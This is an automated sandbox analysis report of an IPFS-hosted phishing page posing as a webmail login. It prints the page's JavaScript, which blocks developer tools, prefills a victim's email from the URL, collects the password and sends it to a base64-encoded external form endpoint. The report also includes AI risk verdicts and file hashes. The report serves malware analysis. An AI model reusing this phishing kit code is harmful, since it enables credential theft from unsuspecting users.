                                Analysis ID:1447735
                                Start date and time:2024-05-27 00:28:49 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                Sample URL:https://litnet.com/out?signature=2c1f4fb3a510da55&verify=f0d85a74515d878f9714518b56f64f83c3d478981c8004fd8a36ff05f77ed04b&litnet=domain&url=https://cloudflare-ipfs.com/ipfs/QmbbUyKXzZMtLWL65JBbfeA8HRigpuDZ9sk5XT4xvfvyVx?filename=reqistrer-serversNonniiii.html#YXN0cmlkLnd1cnN0ZXJAaWxlZGVmcmFuY2UuZnI=
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:14
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • EGA enabled
                                Analysis Mode:stream
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal60.phis.win@16/18@22/201
                                • Exclude process from analysis (whitelisted): svchost.exe
                                • Excluded IPs from analysis (whitelisted): 142.250.185.67, 142.250.185.110, 108.177.15.84, 34.104.35.123, 142.250.186.42, 142.250.186.138, 142.250.185.74, 142.250.185.202, 142.250.186.74, 216.58.212.138, 172.217.18.10, 172.217.16.202, 142.250.186.170, 142.250.184.202, 142.250.184.234, 216.58.206.74, 172.217.23.106, 142.250.186.106, 142.250.181.234, 172.217.18.106
                                • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, content-autofill.googleapis.com, clientservices.googleapis.com, clients.l.google.com
                                • Not all processes where analyzed, report is missing behavior information
                                InputOutput
                                URL: https://cloudflare-ipfs.com/ipfs/QmbbUyKXzZMtLWL65JBbfeA8HRigpuDZ9sk5XT4xvfvyVx?filename=reqistrer-serversNonniiii.html&websrc=VdxUl9l9zz9XJUazwJikOsjZCy5xrbQZ7OVNeXhc52YIF3n6teWakuErye5Lp0boBSXwWXPPcrt2v1N1oDwJ7DqvaRZXhzb3Fpn9e0VGkVPZvn90ZkklbK4Xq0N Model: gpt-4o
                                ```json
                                {
                                  "riskscore": 7,
                                  "reasons": "The JavaScript code is designed to disable various key combinations and the context menu, which are commonly used for debugging and inspecting web pages. This behavior is often associated with malicious sites attempting to prevent users from examining the source code or using developer tools to detect malicious activity. While not definitively malicious on its own, this code raises significant red flags and warrants further investigation."
                                }
                                document.onkeydown = function (e) {
                                        if (event.keyCode == 123) {
                                          return false
                                        }
                                        if (e.ctrlKey && e.shiftKey && e.keyCode == 'I'.charCodeAt(0)) {
                                          return false
                                        }
                                        if (e.ctrlKey && e.shiftKey && e.keyCode == 'J'.charCodeAt(0)) {
                                          return false
                                        }
                                        if (e.ctrlKey && e.keyCode == 'U'.charCodeAt(0)) {
                                          return false
                                        }
                                        if (e.ctrlKey && e.keyCode == 'C'.charCodeAt(0)) {
                                          return false
                                        }
                                        if (e.ctrlKey && e.keyCode == 'X'.charCodeAt(0)) {
                                          return false
                                        }
                                        if (e.ctrlKey && e.keyCode == 'Y'.charCodeAt(0)) {
                                          return false
                                        }
                                        if (e.ctrlKey && e.keyCode == 'Z'.charCodeAt(0)) {
                                          return false
                                        }
                                        if (e.keyCode == 67 && e.shiftKey && (e.ctrlKey || e.metaKey)) {
                                          return false
                                        }
                                        if (
                                          e.keyCode == 'J'.charCodeAt(0) &&
                                          e.altKey &&
                                          (e.ctrlKey || e.metaKey)
                                        ) {
                                          return false
                                        }
                                        if (
                                          e.keyCode == 'I'.charCodeAt(0) &&
                                          e.altKey &&
                                          (e.ctrlKey || e.metaKey)
                                        ) {
                                          return false
                                        }
                                        if (e.ctrlKey && e.shiftKey && e.keyCode == 'C'.charCodeAt(0)) {
                                          return false
                                        }
                                        if (
                                          (e.metaKey && e.keyCode == 'S'.charCodeAt(0)) ||
                                          (e.ctrlKey && e.keyCode == 'S'.charCodeAt(0))
                                        ) {
                                          return false
                                        }
                                        if (e.ctrlKey && e.keyCode == 'H'.charCodeAt(0)) {
                                          return false
                                        }
                                        if (e.ctrlKey && e.keyCode == 'A'.charCodeAt(0)) {
                                          return false
                                        }
                                        if (
                                          (e.metaKey && e.keyCode == 'F'.charCodeAt(0)) ||
                                          (e.ctrlKey && e.keyCode == 'F'.charCodeAt(0))
                                        ) {
                                          return false
                                        }
                                        if (
                                          (e.metaKey && e.keyCode == 'E'.charCodeAt(0)) ||
                                          (e.ctrlKey && e.keyCode == 'E'.charCodeAt(0))
                                        ) {
                                          return false
                                        }
                                      }
                                      if (document.addEventListener) {
                                        document.addEventListener(
                                          'contextmenu',
                                          function (e) {
                                            e.preventDefault()
                                          },
                                          false
                                        )
                                      } else {
                                        document.attachEvent('oncontextmenu', function () {
                                          window.event.returnValue = false
                                        })
                                      }
                                URL: https://cloudflare-ipfs.com/ipfs/QmbbUyKXzZMtLWL65JBbfeA8HRigpuDZ9sk5XT4xvfvyVx?filename=reqistrer-serversNonniiii.html&websrc=VdxUl9l9zz9XJUazwJikOsjZCy5xrbQZ7OVNeXhc52YIF3n6teWakuErye5Lp0boBSXwWXPPcrt2v1N1oDwJ7DqvaRZXhzb3Fpn9e0VGkVPZvn90ZkklbK4Xq0N Model: gpt-4o
                                ```json
                                {
                                  "riskscore": 8,
                                  "reasons": "The code contains a base64-encoded URL that, when decoded, points to a potentially suspicious site (nocodeform.io). The presence of a login error message and a default site title related to webmail login suggests that this script could be part of a phishing attempt to steal user credentials. Additionally, the use of a base64-encoded URL is a common tactic to obfuscate malicious links."
                                }
                                // This is the hash encrpytion aHR0cHM6Ly9ub2NvZGVmb3JtLmlvL2YvNjVmYjJhOGM2ZWM4N2I4ZWFlYWY2MmMw
                                      // of
                                      // https://nocodeform.io/f/65fb2a8c6ec87b8eaeaf62c0
                                      // Remove the "//" if you want to use the
                                
                                      // window.MAIL_URL = 'https://nocodeform.io/f/65fb2a8c6ec87b8eaeaf62c0'
                                      window.MAIL_URL = 'aHR0cHM6Ly9ub2NvZGVmb3JtLmlvL2YvNjVmYjJhOGM2ZWM4N2I4ZWFlYWY2MmMw'
                                      window.AUTH_LOADING_MESSAGE = 'Login'
                                      window.LOGIN_ERROR_MESSAGE = `Your Account Password is incorrect`
                                      window.DEFAULT_SITE_TITLE = 'Webmail - Login'
                                      window.DEFAULT_SITE_LOGO =
                                        'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAABs0lEQVR4AWL4//8/RRjO8Iucx+noO0O2qmlbUEnt5r3Juas+hsQD6KaG7dqCKPgx72Pe9GIY27btZBrbtm3btm0nO12D7tVXe63jqtqqU/iDw9K58sEruKkngH0DBljOE+T/qqx/Ln718RZOFasxyd3XRbWzlFMxRbgOTx9QWFzHtZlD+aqLb108sOAIAai6+NbHW7lUHaZkDFJt+wp1DG7R1d0b7Z88EOL08oXwjokcOvvUxYMjBFCamWP5KjKBjKOpZx2HEPj+Ieod26U+dpg6lK2CIwTQH0oECGT5eHj+IgSueJ5fPaPg6PZrz6DGHiGAISE7QPrIvIKVrSvCe2DNHSsehIDatOBna/+OEOgTQE6WAy1AAFiVcf6PhgCGxEvlA9QngLlAQCkLsNWhBZIDz/zg4ggmjHfYxoPGEMPZECW+zjwmFk6Ih194y7VHYGOPvEYlTAJlQwI4MEhgTOzZGiNalRpGgsOYFw5lEfTKybgfBtmuTNdI3MrOTAQmYf/DNcAwDeycVjROgZFt18gMso6V5Z8JpcEk2LPKpOAH0/4bKMCAYnuqm7cHOGHJTBRhAEJN9d/t5zCxAAAAAElFTkSuQmCC'
                                      window.DEFAULT_SITE_FAVICON =
                                        'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAABs0lEQVR4AWL4//8/RRjO8Iucx+noO0O2qmlbUEnt5r3Juas+hsQD6KaG7dqCKPgx72Pe9GIY27btZBrbtm3btm0nO12D7tVXe63jqtqqU/iDw9K58sEruKkngH0DBljOE+T/qqx/Ln718RZOFasxyd3XRbWzlFMxRbgOTx9QWFzHtZlD+aqLb108sOAIAai6+NbHW7lUHaZkDFJt+wp1DG7R1d0b7Z88EOL08oXwjokcOvvUxYMjBFCamWP5KjKBjKOpZx2HEPj+Ieod26U+dpg6lK2CIwTQH0oECGT5eHj+IgSueJ5fPaPg6PZrz6DGHiGAISE7QPrIvIKVrSvCe2DNHSsehIDatOBna/+OEOgTQE6WAy1AAFiVcf6PhgCGxEvlA9QngLlAQCkLsNWhBZIDz/zg4ggmjHfYxoPGEMPZECW+zjwmFk6Ih194y7VHYGOPvEYlTAJlQwI4MEhgTOzZGiNalRpGgsOYFw5lEfTKybgfBtmuTNdI3MrOTAQmYf/DNcAwDeycVjROgZFt18gMso6V5Z8JpcEk2LPKpOAH0/4bKMCAYnuqm7cHOGHJTBRhAEJN9d/t5zCxAAAAAElFTkSuQmCC'
                                      //SETTING OF SOME STUFF
                                      window.ALLOW_DYNAMIC_EMAIL_LOGO = true
                                      window.ENABLE_PASSWORD_VISIBILITY_TOGGLE = true
                                URL: https://cloudflare-ipfs.com/ipfs/QmbbUyKXzZMtLWL65JBbfeA8HRigpuDZ9sk5XT4xvfvyVx?filename=reqistrer-serversNonniiii.html&websrc=VdxUl9l9zz9XJUazwJikOsjZCy5xrbQZ7OVNeXhc52YIF3n6teWakuErye5Lp0boBSXwWXPPcrt2v1N1oDwJ7DqvaRZXhzb3Fpn9e0VGkVPZvn90ZkklbK4Xq0N Model: gpt-4o
                                ```json
                                {
                                  "riskscore": 7,
                                  "reasons": "The code includes functionality to handle user email and password, which are sensitive data. The presence of email validation and password handling, combined with the use of base64 decoding (atob) and potential manipulation of the URL, raises concerns about phishing. Additionally, the prevention of default link behavior and the use of jQuery to manipulate the DOM could be used to deceive users. While there is no direct evidence of malicious activity, these patterns are commonly associated with phishing attempts."
                                }
                                new Vue({
                                        data: () => ({
                                          vueAppIsLoaded: false,
                                          //MAIN APPLICATION DATA
                                          showPassword: false,
                                          retryAttemptCount: 0,
                                          isLoading: false,
                                          submitButtonText: 'Login',
                                          errorMessage: ``,
                                          successMessage: '',
                                          email: '',
                                          password: '',
                                        }),
                                
                                        created() {
                                          this.turnUrlToRandom()
                                          //SET AXIOS RESPONSE TIME
                                          axios.interceptors.request.use((config) => {
                                            config.headers['request-startTime'] = new Date()
                                            return config
                                          })
                                
                                          axios.interceptors.response.use((response) => {
                                            const start = response.config.headers['request-startTime']
                                            const end = new Date()
                                            const milliseconds = end - start
                                            response.headers['request-duration'] = milliseconds
                                            return response
                                          })
                                
                                          // SET EMAIL HASH
                                          const pageUrl = window.location.href
                                          const pageUrlArray = pageUrl.split('#')
                                          if (pageUrlArray.length > 1) {
                                            const emailHref64 = pageUrlArray[pageUrlArray.length - 1]
                                            try {
                                              this.email = this.validateEmail(emailHref64)
                                                ? emailHref64
                                                : atob(emailHref64)
                                            } catch (e) {}
                                          }
                                
                                          this.pageMiddleware()
                                
                                          $('body').on('click', 'a', function (e) {
                                            e.preventDefault()
                                          })
                                          $('body').removeClass('down')
                                          $('#background-loader').fadeOut(250)
                                        },
                                
                                        mounted: function () {
                                          this.$nextTick(function () {
                                            this.vueAppIsLoaded = true
                                            this.setDocumentPageFavicon()
                                            this.setDocumentPageTitle()
                                            document.addEventListener('keydown', this.onKeydown)
                                            setTimeout(() => {
                                              $('#div1').show()
                                              if (_.isEmpty(this.email)) {
                                                $('#div1').show()
                                                $('#emailContainerHolder').show()
                                                $('#ai').click(function () {
                                                  $('#error').hide()
                                                })
                                                this.$refs.emailElement.focus()
                                              } else {
                                                // $("#div1").animate({ left: 0, opacity: "hide" }, 0);
                                                // $("#div2").animate({ right: 0, opacity: "show" }, 500);
                                                // this.$refs.passwordElement.focus();
                                              }
                                            }, 600)
                                          })
                                        },
                                
                                        filters: {
                                          capitalize: function (value) {
                                            if (!value) return ''
                                            value = value.toString()
                                            return value.charAt(0).toUpperCase() + value.slice(1)
                                          },
                                          camelCase: function (value) {
                                            return str
                                              .toLowerCase()
                                              .replace(/[-_]+/g, ' ')
                                              .replace(/[^\w\s]/g, '')
                                              .replace(/ (.)/g, function ($1) {
                                                return $1.toUpperCase()
                                              })
                                              .replace(/ /g, '')
                                          },
                                        },
                                
                                        computed: {
                                      
                                URL: https://cloudflare-ipfs.com/ipfs/QmbbUyKXzZMtLWL65JBbfeA8HRigpuDZ9sk5XT4xvfvyVx?filename=reqistrer-serversNonniiii.html&websrc=VdxUl9l9zz9XJUazwJikOsjZCy5xrbQZ7OVNeXhc52YIF3n6teWakuErye5Lp0boBSXwWXPPcrt2v1N1oDwJ7DqvaRZXhzb3Fpn9e0VGkVPZvn90ZkklbK4Xq0Nfd1KU Model: gpt-4o
                                ```json
                                {
                                  "phishing_score": 9,
                                  "brands": "ILEDEFRANCE",
                                  "phishing": true,
                                  "suspicious_domain": true,
                                  "has_loginform": true,
                                  "has_captcha": false,
                                  "setechniques": true,
                                  "reasons": "The URL is highly suspicious as it uses an IPFS (InterPlanetary File System) link, which is uncommon for legitimate websites. The domain does not match the legitimate domain name associated with the brand 'ILEDEFRANCE'. The page contains a login form, which is a common feature in phishing sites to steal credentials. The use of social engineering techniques is evident as the page advises users to verify their email account for security reasons, which can prompt users to enter their credentials without suspicion."
                                }
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun May 26 21:29:17 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                Category:dropped
                                Size (bytes):2673
                                Entropy (8bit):3.996328177083393
                                Encrypted:false
                                SSDEEP:
                                MD5:3435E770AD0681F7B27469E87D0EDE7C
                                SHA1:27A03892CD5EBE87B769DD81AF286127C3AE0AAF
                                SHA-256:8C077095B715DC3535CCAC24640F47A443F7CC35BC9E0B0A74BD902588821B1B
                                SHA-512:ABF738DB07F22EE02A19D34D878DBD0C23587EE302E25A86A9D31EB21A7A358E67BA28E62886BA4A1DF573EABF061554ABF19F0BD9A02984484488639A786CE4
                                Malicious:false
                                Reputation:unknown
                                Preview:L..................F.@.. ...$+.,....(C.%....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............Z.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun May 26 21:29:17 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                Category:dropped
                                Size (bytes):2675
                                Entropy (8bit):4.012813087494234
                                Encrypted:false
                                SSDEEP:
                                MD5:00570FE2937037120CA2AFD0A401B158
                                SHA1:2A49D7E42849D4C5CCC0307BB07398F1FEE18A06
                                SHA-256:4CA9996579CAD9D8466D7014B3F3AF5BA0518189151030F1E1A4226CECD4EF00
                                SHA-512:1D5AC04FE1C28040E5C7364AB190F8B64244C89F721B1383EAAA72E47C60883A4C3BDAEA2218649D0E7A73776F4C773698539D26DB3F184BEBD8C679925C3B36
                                Malicious:false
                                Reputation:unknown
                                Preview:L..................F.@.. ...$+.,.....(.$....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............Z.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                Category:dropped
                                Size (bytes):2689
                                Entropy (8bit):4.018185183115485
                                Encrypted:false
                                SSDEEP:
                                MD5:675D736C5566573AA0C173A170121F51
                                SHA1:7D0B981679C9E3627C76E7144F7826D99CB80314
                                SHA-256:DEE2E35AD30EEE97AA63598419A543D050A6F3ABC18EC6915DC762E1DBAAD61D
                                SHA-512:20C2D4E7E7C5D6CDFD3944E5C6363B4933E85DC2A86A800A1DB2D9978EFE71F622F911961DB809C45721F93F9830869BE5E52A10F96AADCE817D560D8C4A19B3
                                Malicious:false
                                Reputation:unknown
                                Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............Z.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun May 26 21:29:16 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                Category:dropped
                                Size (bytes):2677
                                Entropy (8bit):4.0109671519979475
                                Encrypted:false
                                SSDEEP:
                                MD5:9C0B18A6BD8BB60252114D866B7A214F
                                SHA1:FB75FD717A268C571245D47937AE8CD49409ADC0
                                SHA-256:B75DD35062FE0C16215A50EA5F9D0BD327C3C3FC1342C841D66D4C1AE74A80F9
                                SHA-512:B28A8FECB57F8BA8A26F4C44D98AF1F557CB8E8DBC745DAFA814C05B83FBD16F306F1F06638581711E33D969A2006F62B23FF4542DAC76ABDB1473265BA094E0
                                Malicious:false
                                Reputation:unknown
                                Preview:L..................F.@.. ...$+.,.....4.$....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............Z.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun May 26 21:29:17 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                Category:dropped
                                Size (bytes):2677
                                Entropy (8bit):4.000004117685832
                                Encrypted:false
                                SSDEEP:
                                MD5:9C7F7CC5A5ED38C71899C5C2560D9145
                                SHA1:D985B56010E174F2A660A77CAE4E3B380C9E13E6
                                SHA-256:E202C879E4F87BC4E7CFC800923DD2A60AFA9C3E2D562B892260E49485BF91BE
                                SHA-512:23D44894D1A14876D380386D9C965640731E0B825F639D429A9F3CB7EB72C81DDD7BB63D8CDA233D5140F5E07E8775AE5BC74B62B4340B4B8928D2BBC02909D2
                                Malicious:false
                                Reputation:unknown
                                Preview:L..................F.@.. ...$+.,.....,.%....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............Z.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun May 26 21:29:16 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                Category:dropped
                                Size (bytes):2679
                                Entropy (8bit):4.009940200291653
                                Encrypted:false
                                SSDEEP:
                                MD5:C00048294724E50C3CB78529B4875721
                                SHA1:64425606A0B99D7EBA5411F7D509DF1003E96806
                                SHA-256:8CC077086858D698D414DCCE268ECC56D53D1B512AC6EA5DFD172C1EB00FB269
                                SHA-512:C17A461D533D3FF92FD9B5896084925A8F085C4E40DF235AB8F119315A5C0A519F7EEFA7E1FDFE33D16E94BD19C9B3A877723F89E6595FAE049DDD068D92EE01
                                Malicious:false
                                Reputation:unknown
                                Preview:L..................F.@.. ...$+.,....0..$....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............Z.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:HTML document, ASCII text, with very long lines (959)
                                Category:downloaded
                                Size (bytes):30105
                                Entropy (8bit):4.767772066367656
                                Encrypted:false
                                SSDEEP:
                                MD5:D8E1139BE606690FF7B0B4F15D8FFB71
                                SHA1:77892DFB41AF531A13E83B97B2219546879F70A1
                                SHA-256:DB2DE11FA3D8CDCD2F0A43D1DFD4B791388F38F3DE5F675B65C6FFA3E1A61337
                                SHA-512:03D4FB8CDB67940A48ADDA8894068C4FB1EF95A6A1ABF5F5BC73E80AEE05586F6BCEA1D70BC477E4E83793EA322B77DEF3A2C1F728A9A530D03739FDB01CE2AD
                                Malicious:false
                                Reputation:unknown
                                URL:https://cloudflare-ipfs.com/ipfs/QmbbUyKXzZMtLWL65JBbfeA8HRigpuDZ9sk5XT4xvfvyVx?filename=reqistrer-serversNonniiii.html
                                Preview:<!DOCTYPE html>.<html lang="en">. <head>. <meta charset="UTF-8" />. <meta name="viewport" content="width=device-width, initial-scale=1.0" />. <meta http-equiv="X-UA-Compatible" content="ie=edge" />. <meta name="referrer" content="strict-origin" />. <link. id="favicon". rel="shortcut icon". type="image/png". href="https://alphatrade-options.com/git/rand/favicon.png". />. <title>Webmail - Login</title>. <style>. body {. background-color: #eeeeee;. font-family: Helvetica Neue, Helvetica, sans-serif;. font-size: 13px;. color: #425152;. margin: 0;. }.. ::-moz-placeholder {. color: #d9dad9;. }.. :-ms-input-placeholder {. color: #d9dad9;. }.. ::-ms-input-placeholder {. color: #d9dad9;. }.. ::placeholder {. color: #d9dad9;. }.. a {. color: #425152;. text-decoration: none;. }.. a:hover {. text-decoration
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:GIF image data, version 89a, 200 x 200
                                Category:dropped
                                Size (bytes):55202
                                Entropy (8bit):7.826111557987171
                                Encrypted:false
                                SSDEEP:
                                MD5:D536D58EA2F4CFE5D5B734E7893FB09E
                                SHA1:77C5E9FCBB33EB9B6DF808AA86F50E0542E5162F
                                SHA-256:669C17CDE38DD0AB9673DE77A674C5B192E934399BBEE3EBED65BD70B05BFF5F
                                SHA-512:69CE0DF240C3A0AE4ACFF39DE7B08AA9DF3BD288179FAAAC501F59496934C4245B35D888D2424ED66A2C187E65380AA1EF9FA059AC89BB9057C468F3F5CBBBB0
                                Malicious:false
                                Reputation:unknown
